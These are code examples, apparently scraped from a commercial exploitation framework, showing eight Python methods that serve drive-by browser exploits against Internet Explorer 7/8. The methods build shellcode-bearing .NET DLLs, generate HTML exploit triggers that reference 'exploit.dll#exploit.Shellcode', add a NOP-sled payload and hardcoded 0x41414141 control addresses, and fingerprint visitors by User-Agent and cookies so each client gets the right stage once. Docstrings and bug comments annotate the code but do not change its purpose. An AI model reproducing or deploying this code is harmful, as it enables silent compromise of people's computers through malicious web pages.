예제 #1
    def run(self):
        """Write the exploit HTML page, and for the IE7/IE8 variants a companion
        .NET DLL, to the location returned by wp_outputpath().

        self.version selects the variant:
          0 -> HTML from self.makefile('', 'Windows XP'); no DLL is written.
          1 -> HTML for 'MSIE 7.0' plus a DLL built from self.createShellcode().
          2 -> HTML for 'MSIE 8.0' plus a DLL built with an empty first argument.
        Any other value leaves filedata/dlldata unassigned, so the write below
        raises NameError.

        Returns:
            1, unconditionally.
        """

        if (self.version == 0):
            filedata=self.makefile('','Windows XP')
            dlldata =""
        elif (self.version ==1):
            filedata=self.makefile('MSIE 7.0','')
            # vProtect is switched on only around createShellcode(); what it
            # changes happens inside createShellcode (defined elsewhere).
            self.vProtect = True    # Needed for this type of payload
            p = PElib()
            dlldata = p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
            self.vProtect = False   # Reset this
        elif (self.version ==2):
            filedata=self.makefile('MSIE 8.0','')
            p = PElib()
            dlldata = p.createDotNETPEFileBuf("", self.pc)

        outputfile = wp_outputpath(self.filename)
        self.log("WP> Opening %s"%outputfile )
        
        # NOTE: file() is the Python 2 builtin (removed in Python 3); 'wb+'
        # truncates any existing file at this path without warning.
        fd=file(outputfile,'wb+')
        fd.write(filedata)
        fd.close()
        self.log('WP> Wrote to %s'%outputfile)
        
        if dlldata != "": 
            # str.replace swaps every 'html' substring in the name, not just
            # the extension (e.g. 'html_page.html' is changed in two places).
            dllfile = wp_outputpath(self.filename.replace('html','dll'))
            # create the dll file
            f = open(dllfile,'wb')
            f.write(dlldata)
            f.flush()
            # BUG: missing parentheses -- this only references the bound method
            # and never closes the handle; flush() above has already pushed the
            # buffered bytes to the OS, so the content is written regardless.
            f.close
            self.log('WP> Created DLL file %s'%dllfile)
        
        return 1
예제 #2
    def makesploit(self, clientheader, clientbody):
        """Build the HTTP response for one request arriving through the proxy.

        Dispatches on substrings of clientheader.URL (str.count, so any
        occurrence anywhere in the URL matches, not just the path component):
          - contains self.filename -> HTML from self.makefile(browser, osversion)
            with a 'SessionID' Set-Cookie derived from the JS obfuscator key;
          - contains '.dll'        -> .NET DLL from PElib, variant chosen by the
            User-Agent-derived browser string ('MSIE 7.0' vs anything else);
          - otherwise              -> 302 redirect to self.filename.

        Args:
            clientheader: request header object (project type) exposing .URL
                and .getStrValue().
            clientbody: request body; not read here.

        Returns:
            (header, body) from libs.spkproxy, or (None, None) when the HTML or
            DLL data comes back empty/falsy.
        """
        # Return value is discarded; the DLL branch below calls it again and
        # uses that result.  Side effects, if any, happen in createShellcode().
        self.createShellcode()

        # The main call from ClientD
        from libs.spkproxy import header, body

        h = header('SERVER')
        b = body()

        self.log('WP> ****************************************')
        self.log("WP> URL Received: %s" % clientheader.URL)
        user_agent = clientheader.getStrValue(['User-Agent'])

        # Get details -- browser/osversion are whatever wp_browserinfo parses
        # out of the client-supplied User-Agent; both are attacker-controlled
        # from the server's point of view and are only logged/compared here.
        browser, osversion = wp_browserinfo(user_agent)
        self.log('WP> OSVersion: %s' % osversion)
        self.log('WP> Browser: %s' % browser)
        self.log('WP> ')

        #self.log('WP> User agent of connecting host: %s' % user_agent)

        if clientheader.URL.count(self.filename):
            self.log('WP> Serving exploit html file')

            data = self.makefile(browser, osversion)
            if not data:
                return None, None
            b.setBody(data)
            h.addHeader('Content-Type', 'text/html')
            h.addHeader('Set-Cookie',
                        'SessionID=%d' % self.jsObfuscator.getXORKey())

        elif (clientheader.URL.count('.dll')):
            if browser == "MSIE 7.0":
                self.log('WP> Serving IE7 .Net DLL file')
                # vProtect is raised only for the duration of createShellcode()
                self.vProtect = True  # Needed for this type of payload
                p = PElib()
                data = p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
                self.vProtect = False  # Reset this
            else:
                self.log('WP> Serving IE8 .Net DLL file')
                p = PElib()
                data = p.createDotNETPEFileBuf("", self.pc)

            if not data:
                return None, None
            b.setBody(data)
            h.addHeader('Content-Type', 'application/octet-stream')
        else:
            self.log('WP> Redirecting to self')
            h.status = '302'
            h.addHeader('Location', self.filename)
            h.addHeader('Content-Type', 'text/html')

        self.log('WP> ****************************************')
        return h, b
예제 #3
    def makefile(self, clientheader):
        """Return the response body for a request: the .NET DLL when the URL
        contains 'exploit.dll', otherwise the HTML page that references it.

        Args:
            clientheader: request header object (project type) exposing .URL.

        Returns:
            DLL bytes from PElib.createDotNETPEFileBuf, or the HTML string.
        Note: `html` is only bound in the else branch; the final `return html`
        is reachable only from there because the DLL branch returns early.
        """

        if "exploit.dll" in clientheader.URL:
            self.log("SENDING .NET DLL...................")
            from pelib import PElib
            p = PElib()
            """
	    438242F4    8B08            MOV ECX,DWORD PTR DS:[EAX]  ; EAX=41414141
	    438242F6    57              PUSH EDI
	    438242F7    50              PUSH EAX
	    438242F8    FF91 84000000   CALL DWORD PTR DS:[ECX+84]  ; ECX = 414140C1
	    """
            return p.createDotNETPEFileBuf("\xC1\x40\x41\x41" + "\x49\x41\x41\x41" + self.createShellcode(), 0x41414141)
        else:
            self.log("SENDING HTML...................")
            import random
            # The classid is prefixed with a random 0..65535 value so the
            # object reference differs per response; random (not secrets) is
            # fine here since it is not used as a secret.
            html = """
                 <html>
                 <body>
                 <script>
                 document.write("<object classid='%dexploit.dll#exploit.Shellcode'></object><XML ID=I><X><C><![CDATA[<image SRC=http://&#16705;&#16705;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><HTML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN></HTML>");

                 </script>
                 </body>
                 </html>
                 """%(random.randint(0,65535))

        return html
예제 #4
    def makesploit(self, clientheader, clientbody):
        """Build the HTTP response for one proxied request.

        Branches on substrings of clientheader.URL (str.count, so a match
        anywhere in the URL counts):
          - 'd2.dll'       -> .NET DLL from PElib (application/octet-stream)
          - self.avifile   -> contents of the AVI file read from disk
          - anything else  -> HTML from self.makefile() (text/html)

        Args:
            clientheader: request header object (project type) exposing .URL.
            clientbody: request body; not used.

        Returns:
            (header, body) from libs.spkproxy.
        """
        from libs.spkproxy import header, body
        h = header('SERVER')
        b = body()

        # .NET DLL request
        if clientheader.URL.count("d2.dll"):
            self.log("Sending .NET DLL file")
            p = PElib()
            sploitstring = p.createDotNETPEFileBuf(
                ("\x90" * 0xd000) + self.createShellcode(), 0x74000000)
            h.addHeader('Content-Type', 'application/octet-stream')
            b.setBody(sploitstring)

        # AVI file request
        elif clientheader.URL.count(self.avifile):
            self.log("Sending AVI file")
            # Path is relative to the process working directory, not to this
            # module, so the read fails if the tool is launched from elsewhere.
            # An exception from open()/read() propagates and leaves the handle
            # to the garbage collector (no with/try-finally).
            f = open(
                os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_directshow/" +
                self.avifile, "rb")
            sploitstring = f.read()
            f.close()
            h.addHeader('Content-Type', 'application/octet-stream')
            b.setBody(sploitstring)

        # Index file request (default branch)
        else:
            sploitstring = self.makefile()
            h.addHeader('Content-Type', 'text/html')
            b.setBody(sploitstring)

        return h, b
예제 #5
    def makefileIE7_part2(self):
        """Return the .NET DLL image that accompanies the IE7 HTML stage.

        The buffer comes from PElib.createDotNETPEFileBuf, fed with the
        current shellcode and self.pc (both project-defined; nothing is
        validated here).
        """
        builder = PElib()
        return builder.createDotNETPEFileBuf(self.createShellcode(), self.pc)
예제 #6
    def makefile(self, clientheader):
        """Return the response body for a request, chosen by URL substring.

          - self.dllfile in URL -> .NET DLL from PElib
          - self.wavfile in URL -> bytes from self.generate_wav()
          - otherwise           -> HTML page referencing both files

        Args:
            clientheader: request header object (project type) exposing .URL.

        Returns:
            bytes/str payload for the matching branch; never None.
        """

        if self.dllfile in clientheader.URL:
            self.log('[+] Sending .NET DLL')
            p = PElib()
            return p.createDotNETPEFileBuf(self.createShellcode(), self.pc)

        elif self.wavfile in clientheader.URL:
            self.log('[+] Sending WAV file')
            return self.generate_wav()

        else:
            self.log('[+] Sending HTML file')
            # `random` is assumed to be imported at module level (not in this
            # block).  The random 0..65535 prefix on the CLASSID changes the
            # object reference per response; it carries no secrecy requirement.
            html = """<html>
<body>
<OBJECT CLASSID='%d%s#exploit.Shellcode'></OBJECT>
<EMBED src="%s" autostart=true loop=false volume=100 hidden=true>
<NOEMBED>
<BGSOUND src="%s">
</NOEMBED>
</body>
</html>""" % (random.randint(0,
                             65535), self.dllfile, self.wavfile, self.wavfile)
            return html
예제 #7
    def makefile(self, clientheader):
        """Return the response body for a request, chosen by URL substring.

          - self.dllfile in URL -> .NET DLL from PElib
          - self.wmafile in URL -> raw bytes of self.wmasrc read from disk
                                   ('' if the file cannot be read)
          - otherwise           -> HTML page embedding both files

        Args:
            clientheader: request header object (project type) exposing .URL.

        Returns:
            bytes/str payload for the matching branch.
        """

        if self.dllfile in clientheader.URL:
            self.log('[+] Sending .NET DLL')
            p = PElib()
            return p.createDotNETPEFileBuf(self.createShellcode(), self.pc)

        elif self.wmafile in clientheader.URL:
            self.log('[+] Sending ASF file')
            wma = ''
            # NOTE(review): the bare `except:` swallows every exception,
            # including KeyboardInterrupt/SystemExit, and hides the real
            # cause (missing file vs. permission error).  If read() raises,
            # fd is never closed here.  Narrowing to IOError/OSError and
            # using `with open(...)` would keep the same '' fallback.
            try:
                fd = open(self.wmasrc, 'rb')
                wma = fd.read()
                fd.close()
            except:
                self.log('[-] Could not read ASF file!')
            return wma

        else:
            self.log('[+] Sending HTML file')
            # `random` is assumed to be imported at module level.  The CODEBASE
            # URL points at an external Microsoft host, so rendering this page
            # makes the client fetch from outside the serving host.
            html = """<html>
<body>
<OBJECT CLASSID='%d%s#exploit.Shellcode'></OBJECT>
<OBJECT ID="MediaPlayer" CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab# Version=5,1,52,701" STANDBY="Loading Microsoft Windows Media Player components..." TYPE="application/x-oleobject" width="280" height="46">
<param name="fileName" value="%s">
<param name="animationatStart" value="true">
<param name="transparentatStart" value="true">
<param name="autoStart" value="true">
<param name="showControls" value="true">
<param name="Volume" value="-300">
<embed type="application/x-mplayer2" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/" src="%s" name="MediaPlayer" width=280 height=46 autostart=1 showcontrols=1 volume=-300>
</OBJECT>
</body>
</html>""" % (random.randint(0,
                             65535), self.dllfile, self.wmafile, self.wmafile)
            return html
예제 #8
    def makesploit(self, clientheader, clientbody):
        """Build the HTTP response for one proxied request, using the Cookie
        header to avoid re-serving the same stage to a client.

        Dispatch is on substrings of clientheader.URL (str.count):
          - self.filename       -> primary HTML (blank if cookie has 'SessionID')
          - '.dll'              -> .NET DLL, IE7 or IE8 variant by browser string
          - '.2.html'           -> secondary HTML (blank if cookie has 'SessionID2')
          - 'iexplore.exe.config', 'jreVerify.class', 'favicon.ico' -> blank page
          - otherwise           -> 302 redirect to self.filename

        Args:
            clientheader: request header object (project type) exposing .URL
                and .getStrValue().
            clientbody: request body; not used.

        Returns:
            (header, body) from libs.spkproxy.  Unlike the None-checked variant
            of this method, empty data is sent as an empty body here.
        """
        # Return value is discarded; the DLL branch calls it again and uses
        # that result.
        self.createShellcode()

        # The main call from ClientD
        from libs.spkproxy import header, body

        h = header('SERVER')
        b = body()

        self.log('WP> ****************************************')
        self.log("WP> URL Received: %s" % clientheader.URL)
        user_agent = clientheader.getStrValue(['User-Agent'])
        # Assumes getStrValue returns a str even when the header is absent
        # (cookies.count() below would fail on None) -- not verifiable here.
        cookies = clientheader.getStrValue(['Cookie'])

        # Get details -- derived entirely from the client-supplied User-Agent.
        browser, osversion = wp_browserinfo(user_agent)
        self.log('WP> OSVersion: %s' % osversion)
        self.log('WP> Browser: %s' % browser)
        self.log('WP> ')

        #self.log('WP> User agent of connecting host: %s' % user_agent)
        #self.log('WP> Cookies of connecting host: %s' % cookies)

        if clientheader.URL.count(self.filename):
            # Substring test: a cookie string containing only 'SessionID2'
            # also matches 'SessionID', so such a client gets the blank page.
            if cookies.count("SessionID"):
                self.log('WP> Exploit already sent to this client')
                self.log('WP> Returning blank page')
                data = ""
            else:
                self.log('WP> Serving exploit html file')
                data = self.makefile(browser, osversion)

            b.setBody(data)
            h.addHeader('Content-Type', 'text/html')
            h.addHeader('Set-Cookie',
                        'SessionID=%d' % self.jsObfuscator.getXORKey())

        elif (clientheader.URL.count('.dll')):
            p = PElib()
            if browser == "MSIE 7.0":
                self.log('WP> Serving IE7 .Net DLL file')
                # vProtect is raised only for the duration of createShellcode()
                self.vProtect = True  # Needed for this type of payload
                data = p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
                self.vProtect = False  # Reset this
            else:
                self.log('WP> Serving IE8 .Net DLL file')
                data = p.createDotNETPEFileBuf("", self.pc)

            b.setBody(data)
            h.addHeader('Content-Type', 'application/octet-stream')

        elif (clientheader.URL.count('.2.html')):
            if cookies.count("SessionID2"):
                self.log('WP> Exploit already sent to this client')
                self.log('WP> Returning blank page')
                data = ""
            else:
                self.log('WP> Serving exploit secondary file')
                if browser == "MSIE 7.0":
                    data = self.makefileIE7(2)
                else:
                    data = self.makefileIE8_VistaWin7(2)

            b.setBody(data)
            h.addHeader('Content-Type', 'text/html')
            h.addHeader('Set-Cookie',
                        'SessionID2=%d' % self.jsObfuscator.getXORKey())

        # The next three branches answer ancillary requests the browser makes
        # on its own with an empty text/html body instead of a redirect.
        elif (clientheader.URL.count('iexplore.exe.config')):
            self.log('WP> Returning blank page')
            b.setBody("")
            h.addHeader('Content-Type', 'text/html')

        elif (clientheader.URL.count('jreVerify.class')):
            self.log('WP> Returning blank page')
            b.setBody("")
            h.addHeader('Content-Type', 'text/html')
        elif (clientheader.URL.count('favicon.ico')):
            self.log('WP> Returning blank page')
            b.setBody("")
            h.addHeader('Content-Type', 'text/html')
        else:
            self.log('WP> Redirecting to self')
            h.status = '302'
            h.addHeader('Location', self.filename)
            h.addHeader('Content-Type', 'text/html')

        self.log('WP> ****************************************')
        return h, b